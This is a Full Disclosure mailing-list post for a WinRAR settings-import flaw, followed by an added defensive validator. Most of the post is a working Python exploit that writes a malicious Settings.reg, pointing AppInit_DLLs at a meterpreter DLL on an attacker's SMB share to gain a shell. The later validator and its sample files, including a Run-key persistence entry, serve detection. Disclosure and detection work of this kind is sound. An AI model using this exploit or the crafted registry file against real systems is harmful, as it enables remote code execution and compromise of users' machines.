Date: Fri, 2 Oct 2015 11:14:46 +0200
From: Rio Sherri <rio.sherri@...nstudent.info>
To: fulldisclosure@...lists.org
Subject: [FD] WinRar Settings Import Command Execution

#!/usr/bin/env python3
#
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : WinRAR < 5.30 beta 4
#
# The vulnerability exists in the "Import Settings From File" function.
# WinRAR saves its settings as a registry (.reg) file, and "Import Settings
# From File" applies such a file to the registry automatically, without
# checking that it only writes to the registry keys used by WinRAR. A
# specially crafted settings file can therefore overwrite arbitrary registry
# keys.
#
# With write access to the registry there are various ways to get code
# execution, such as defining "Run" keys or creating new services. The most
# direct is AppInit DLLs: every DLL listed in the AppInit_DLLs value is loaded
# into each new process that loads user32.dll (only while LoadAppInit_DLLs is
# 1, which the crafted file sets as well). Here AppInit_DLLs is pointed at a
# meterpreter DLL payload on a UNC path to an SMB server we control, so the
# next process that starts loads it and hands us a shell.
#
# Two caveats: HKEY_LOCAL_MACHINE\SOFTWARE is writable only by an elevated
# process, so this particular route needs the import to run with administrator
# rights (the HKEY_CURRENT_USER "Run" key route does not), and on Windows 8
# and later AppInit_DLLs are disabled when Secure Boot is enabled.
#
# Read more about AppInit DLLs:
# https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRAR
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor contacted, PoC provided
# 02/10/2015 - Vendor released patch in WinRAR 5.30 beta 4, which verifies the
#              presence of [HKEY_CURRENT_USER\Software\WinRAR] or the
#              [HKEY_CURRENT_USER\Software\WinRAR\ prefix in the imported file
#

# ASCII-art banner (raw strings, so the backslashes in the art are literal)
banner = "\n".join([
    r" ___ __ ____ _ _ ",
    r" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | ",
    r" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | ",
    r" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ ",
    r" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|",
]) + "\n"

print(banner)
print("[+] WinRar Settings Import Command Execution [+]\n")

# UNC path of the payload DLL on the attacker's SMB server,
# e.g. \\192.168.1.10\share\payload.dll
dll = input("[+] Enter dll location (smb) : ")
# .reg string values escape every backslash as "\\", so double them here
dll = dll.replace("\\", "\\\\")

print("[+] Writing Content To Settings.reg [+]")

# The crafted "settings" file: instead of WinRAR's own keys it sets the
# system-wide AppInit_DLLs value and turns AppInit DLL loading on.
evil = (
    "Windows Registry Editor Version 5.00\n\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n"
    f'"AppInit_DLLs"="{dll}"\n'
    '"LoadAppInit_DLLs"=dword:00000001\n'
)
print(evil)

with open("Settings.reg", "w") as f:
    f.write(evil)

print("[+] Settings.reg created successfully [+]")
print("\n https://www.infogen.al/ \n")
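The check the disclosure timeline describes, and the AppInit/Run-key targets the script relies on, as an added example that is not part of this advisory or of WinRAR's own code: a Python validator that parses a .reg settings file and rejects any key that is not HKEY_CURRENT_USER\Software\WinRAR or a subkey of it. Reading the vendor's check as that allow-list is my interpretation; the constant and function names (ALLOWED_ROOT, WATCHLIST, parse_reg, key_allowed, check_settings_file), the watch-list of code-execution locations and the three sample .reg contents are all constructed for the example.

```python
import re

# Tree an imported WinRAR settings file may legitimately touch. The 5.30 beta 4
# fix is described as checking for [HKEY_CURRENT_USER\Software\WinRAR] or the
# [HKEY_CURRENT_USER\Software\WinRAR\ prefix. The comparison is case-insensitive
# (registry key names are) and requires the separator, so ...\WinRAREvil fails.
ALLOWED_ROOT = r"HKEY_CURRENT_USER\Software\WinRAR"

# Key fragments that commonly give code execution or persistence when written.
# Assumed watch-list used only to label findings; it is not from the advisory.
WATCHLIST = {
    r"\CurrentVersion\Windows": "AppInit_DLLs injection",
    r"\CurrentVersion\Run": "Run/RunOnce autostart",
    r"\CurrentControlSet\Services": "service definition",
}

_KEY_RE = re.compile(r"^\[(?P<delete>-?)(?P<path>[^\]]+)\]$")


def parse_reg(text):
    """Parse .reg text into [(key_path, is_delete, {name: raw_value}), ...]."""
    lines = text.lstrip("\ufeff").splitlines()
    if not lines or lines[0].strip() not in ("Windows Registry Editor Version 5.00", "REGEDIT4"):
        raise ValueError("missing .reg header")
    # A trailing backslash continues a hex value on the next line.
    logical = []
    for raw in lines[1:]:
        if logical and logical[-1].endswith("\\"):
            logical[-1] = logical[-1][:-1] + raw.strip()
        else:
            logical.append(raw.strip())
    entries, current = [], None
    for line in logical:
        if not line or line.startswith(";"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = (m.group("path"), m.group("delete") == "-", {})
            entries.append(current)
            continue
        if current is None:
            raise ValueError("value before any key: " + line)
        name, _, value = line.partition("=")
        name = "@" if name == "@" else name.strip().strip('"')
        current[2][name] = value.strip()
    return entries


def key_allowed(path):
    """True if path is ALLOWED_ROOT itself or a subkey of it (case-insensitive)."""
    p = path.rstrip("\\").lower()
    root = ALLOWED_ROOT.lower()
    return p == root or p.startswith(root + "\\")


def check_settings_file(text):
    """Return (ok, findings); ok is False if any key lies outside ALLOWED_ROOT."""
    findings = []
    for path, is_delete, values in parse_reg(text):
        if key_allowed(path):
            continue
        label = "outside " + ALLOWED_ROOT
        for fragment, meaning in WATCHLIST.items():
            if fragment.lower() in path.lower():
                label += "; " + meaning
        if is_delete:
            label += "; deletes key"
        if values:
            label += "; sets " + ", ".join(values)
        findings.append(f"[{path}] {label}")
    return (not findings, findings)


# Constructed samples (not real WinRAR exports): the file the script above
# produces with a made-up UNC path, a benign settings file, and a file that
# opens with the legitimate key but then adds a lower-cased Run key.
CRAFTED = "\n".join([
    "Windows Registry Editor Version 5.00",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]",
    r'"AppInit_DLLs"="\\\\10.0.0.5\\share\\payload.dll"',
    '"LoadAppInit_DLLs"=dword:00000001',
])
BENIGN = "\n".join([
    "Windows Registry Editor Version 5.00",
    r"[HKEY_CURRENT_USER\Software\WinRAR\General]",
    '"ListMode"=dword:00000001',
    r"[HKEY_CURRENT_USER\Software\WinRAR\Profiles\0]",
    '"Name"="Default"',
    '"Data"=hex:01,00,\\',
    "  02,00",
])
SNEAKY = "\n".join([
    "REGEDIT4",
    r"[HKEY_CURRENT_USER\Software\WinRAR]",
    r"[hkey_current_user\software\microsoft\windows\currentversion\run]",
    r'"Updater"="C:\\Users\\Public\\u.exe"',
])

if __name__ == "__main__":
    for name, sample in (("crafted", CRAFTED), ("benign", BENIGN), ("sneaky", SNEAKY)):
        ok, findings = check_settings_file(sample)
        print(name, "allowed" if ok else "REJECTED", *findings, sep="\n  ")
```

To run it against a file on disk, pass `open(path, encoding="utf-16").read()` (regedit exports version 5.00 files as UTF-16) or a plain `read()` for the ANSI file the script above writes. The two details that matter for the check are the ones the SNEAKY sample exercises: every key in the file has to pass, not just the first, and the prefix comparison has to be case-insensitive and anchored on the backslash separator, otherwise a file that starts with a legitimate WinRAR key or names a sibling key such as WinRAREvil slips through.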

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
